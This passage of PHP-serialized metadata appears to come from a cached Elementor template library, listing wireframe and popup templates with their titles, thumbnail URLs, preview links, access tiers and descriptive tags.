2\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2-2.jpg\";s:12:\"tmpl_created\";i:1653990132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:123:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:121;a:20:{s:4:\"tmpl\";i:1446;s:2:\"id\";i:24644;s:5:\"title\";s:27:\"Wireframe &#8211; Webinar 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Webinar-1.jpg\";s:12:\"tmpl_created\";i:1653990164;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-webinar-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:177:\"[\"About\",\"Academy\",\"Booking\",\"Conference\",\"Course Online\",\"Education\",\"Features\",\"Footer\",\"Form\",\"Landing Pages\",\"Online Event\",\"Online Service\",\"Subscribe\",\"Virtual\",\"Webinar\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:122;a:20:{s:4:\"tmpl\";i:1447;s:2:\"id\";i:24655;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3-2.jpg\";s:12:\"tmpl_created\";i:1653990198;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:143:\"[\"About\",\"Agency\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Portfolio\",\"Professional\",\"Project\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:123;a:20:{s:4:\"tmpl\";i:1448;s:2:\"id\";i:24677;s:5:\"title\";s:28:\"Wireframe &#8211; Services 4\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-4.jpg\";s:12:\"tmpl_created\";i:1653990233;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:102:\"[\"About\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:124;a:20:{s:4:\"tmpl\";i:1449;s:2:\"id\";i:24687;s:5:\"title\";s:28:\"Wireframe &#8211; Products 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Products-1.jpg\";s:12:\"tmpl_created\";i:1653990273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-products-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:128:\"[\"About\",\"Booking\",\"Business\",\"Clients\",\"Ecommerce\",\"Features\",\"Footer\",\"Landing Pages\",\"Products\",\"Sales\",\"Shop\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:125;a:20:{s:4:\"tmpl\";i:1450;s:2:\"id\";i:24706;s:5:\"title\";s:28:\"Wireframe &#8211; Services 5\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-5.jpg\";s:12:\"tmpl_created\";i:1653990322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:149:\"[\"About\",\"Booking\",\"Consulting\",\"Contact\",\"Doctor\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:126;a:20:{s:4:\"tmpl\";i:1451;s:2:\"id\";i:23604;s:5:\"title\";s:38:\"Classic | Subscribe | Nail Polish Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/38-Subscribe-Nail-Polish-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1660205114;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-subscribe-nail-polish-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:127;a:20:{s:4:\"tmpl\";i:1452;s:2:\"id\";i:23047;s:5:\"title\";s:46:\"Fly-In | Contact | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small.jpg\";s:12:\"tmpl_created\";i:1660205149;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/fly-in-contact-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Contact\",\"Ebook\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:128;a:20:{s:4:\"tmpl\";i:1199;s:2:\"id\";i:18839;s:5:\"title\";s:27:\"Hello Bar | CTA | eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/05/350x250.png\";s:12:\"tmpl_created\";i:1621870603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/hello-bar-cta-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:41:\"[\"Ecommerce\",\"Online Shop\",\"Sale\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:129;a:20:{s:4:\"tmpl\";i:1247;s:2:\"id\";i:21907;s:5:\"title\";s:50:\"Fly-In | Team Details  | Electronic Music Festival\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/Kit-8-electronic-music-festival-CTA-image-1.jpg\";s:12:\"tmpl_created\";i:1646660881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/fly-in-team-details-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:130;a:20:{s:4:\"tmpl\";i:1253;s:2:\"id\";i:22162;s:5:\"title\";s:46:\"Full Screen | Menu | Electronic Music Festival\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/8-music-festival-Team-Details.jpg\";s:12:\"tmpl_created\";i:1647272934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:154:\"https://library.elementor.com/popups/full-screen-menu-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:131;a:20:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:22172;s:5:\"title\";s:45:\"Classic | Discount | Health &#038; Beauty Spa\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/health-beauty-spa-small.jpg\";s:12:\"tmpl_created\";i:1647273547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-discount-popup-health-beauty-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:36:\"[\"Hair\",\"Health\",\"Sales\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:132;a:20:{s:4:\"tmpl\";i:1255;s:2:\"id\";i:22183;s:5:\"title\";s:44:\"Hello Bar | CTA | Environmental Organization\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/11-Environmental-Organization-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647274384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/hello-bar-cta-popup-environmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:133;a:20:{s:4:\"tmpl\";i:1256;s:2:\"id\";i:22195;s:5:\"title\";s:39:\"Classic | Discount | Italian Restaurant\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/restaurant-small.jpg\";s:12:\"tmpl_created\";i:1647329432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-discount-popup-italian-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Restaurant\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:134;a:20:{s:4:\"tmpl\";i:1257;s:2:\"id\";i:22210;s:5:\"title\";s:45:\"Bottom Bar | Discount | Technology Conference\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tech-conference-small.jpg\";s:12:\"tmpl_created\";i:1647330423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/bottom-bar-discount-popup-technology-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:38:\"[\"Conference\",\"Sales\",\"Save the Date\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:135;a:20:{s:4:\"tmpl\";i:1258;s:2:\"id\";i:22221;s:5:\"title\";s:32:\"Hello Bar | Menu | Tattoo Studio\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small-1.jpg\";s:12:\"tmpl_created\";i:1647330705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/hello-bar-menu-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:17:\"[\"Header\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:136;a:20:{s:4:\"tmpl\";i:1259;s:2:\"id\";i:22231;s:5:\"title\";s:37:\"Full Screen | Booking | Tattoo Studio\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/tattoo-studio-small.jpg\";s:12:\"tmpl_created\";i:1647331823;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-booking-popup-tattoo-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:137;a:20:{s:4:\"tmpl\";i:1260;s:2:\"id\";i:22251;s:5:\"title\";s:34:\"Classic | Discount | Dental Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/dental-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647332171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-popup-dental-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Health\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:138;a:20:{s:4:\"tmpl\";i:1261;s:2:\"id\";i:22261;s:5:\"title\";s:34:\"Slide-In | Contact | Makeup Artist\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/20-Makeup-Artist-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647333946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/slide-in-contact-popup-makeup-artist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:139;a:20:{s:4:\"tmpl\";i:1262;s:2:\"id\";i:22271;s:5:\"title\";s:24:\"Fly-In | CTA | Headphone\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/headphones-1-small.jpg\";s:12:\"tmpl_created\";i:1647334784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-cta-popup-headphone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:41:\"[\"cta\",\"Ecommerce\",\"Marketing\",\"Product\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:140;a:20:{s:4:\"tmpl\";i:1263;s:2:\"id\";i:22277;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/online-course-2.jpg\";s:12:\"tmpl_created\";i:1647337110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-popup-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Course Online\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:141;a:20:{s:4:\"tmpl\";i:1264;s:2:\"id\";i:22283;s:5:\"title\";s:40:\"Bottom Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistant-3.jpg\";s:12:\"tmpl_created\";i:1647337517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-contact-popup-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:142;a:20:{s:4:\"tmpl\";i:1265;s:2:\"id\";i:22289;s:5:\"title\";s:32:\"Fly-In | Contact | Private Tutor\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-4.jpg\";s:12:\"tmpl_created\";i:1647337676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-contact-popup-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:27:\"[\"Contact\",\"Course Online\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:143;a:20:{s:4:\"tmpl\";i:1266;s:2:\"id\";i:22295;s:5:\"title\";s:31:\"Classic |  Login | Login Travel\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/login-travel-6.jpg\";s:12:\"tmpl_created\";i:1647339467;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-login-popup-login-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:144;a:20:{s:4:\"tmpl\";i:1267;s:2:\"id\";i:22301;s:5:\"title\";s:36:\"Full Screen | Login | Login Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/login-business-7.jpg\";s:12:\"tmpl_created\";i:1647339782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/full-screen-login-popup-login-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:16:\"[\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:145;a:20:{s:4:\"tmpl\";i:1268;s:2:\"id\";i:22307;s:5:\"title\";s:28:\"Classic | Login | Login Blog\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/login-blog-8.jpg\";s:12:\"tmpl_created\";i:1647339986;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-login-popup-login-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:146;a:20:{s:4:\"tmpl\";i:1269;s:2:\"id\";i:22313;s:5:\"title\";s:31:\"Classic | Login | Login Fashion\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/login-fashion-9.jpg\";s:12:\"tmpl_created\";i:1647340204;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-login-popup-login-fashion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Fashion\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:147;a:20:{s:4:\"tmpl\";i:1270;s:2:\"id\";i:22319;s:5:\"title\";s:40:\"Classic |  Login | Login Design 